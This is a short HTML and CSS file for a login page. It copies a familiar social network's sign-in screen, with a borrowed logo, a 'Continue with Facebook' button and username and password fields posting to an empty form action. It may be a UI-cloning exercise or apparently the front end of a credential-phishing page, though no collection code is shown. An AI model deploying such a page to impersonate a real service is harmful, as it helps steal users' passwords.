<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
        <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=devic­e-width, initial-scale=1.0, user-scalable=no">
    <meta property="og:image" href="">
    <link rel="SHORTCUT ICON" href="" type="image/jpg">
    <meta name="description" content="">
    <title>Log in - Sign up</title>
  </head>
  <body>
    <div class="logtext">
      <img class="logo" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSWjGiS7bY3TmlvqQOw44GJh1pqbVKstQPWbQ&usqp=CAU" alt="" />
    </div>
    <script src="https://kit.fontawesome.com/66aa7c98b3.js" crossorigin="anonymous"></script>
    <div class="fb">
      <a id="ow" href="#"><i class="fab fa-facebook"></i>Continue with Facebook</a>
    </div><br><br>
    <form action="" method="POST" accept-charset="utf-8">
      <input placeholder="Phone,email or username" type="text" name="email" value="" />
      <input type="password" name="password" placeholder="Password" value="" />
      <a id="aw" href="">Forgot password?</a>
      <button type="submit">Log in</button>
    </form>
    <p>Don't have an account?<a id="ew" href="">   Sign up</a></p>
    <style type="text/css" media="all">
      * {
        box-sizing: border-box;
      }
      .logo {
        width: 180px;
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 25px;
      }
      .fb {
        display: block;
        margin-left: auto;
        margin-right: auto;
        background: #1868deee;
        width: 85%;
        height: 30px;
      }
      #ow {
        text-decoration: none;
        text-align: center;
        display: flex;
        align-items: center;
        justify-content: center;
        font-weight: bold;
        color: white;
        font-size: 13px;
      }
      i {
        font-size: 20px;
        color: white;
        margin: 5px;
        margin-right: 10px;
      }
      input {
        width: 85%;
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 7px;
        height: 40px;
      }
      #aw {
        text-decoration: none;
        display: flex;
        align-items: center;
        justify-content: center;
        margin-top: 20px;
        color: #107ce0cb;
      }
      button {
        width: 300px;
        display: block;
        margin-left: auto;
        margin-right: auto;
        margin-top: 20px;
        height: 35px;
        font-weight: bold;
        color: white;
        background: #0a85eddf;
        border: none;
        outline: none;
        font-size: 16px;
      }
      p {
        text-align: center;
        display: flex;
        align-items: center;
        justify-content: center;
        margin-top: 30px;
      }
      #ew {
        text-decoration: none;
        font-weight: bold;
        color: #107ce0cb;
        margin: 2px;
      }
      @media  only screen and (min-width: 768px){
        input {
          width: 300px;
        }
        .fb {
          width: 300px;
        }
      }
    </style>
  </body>
</html>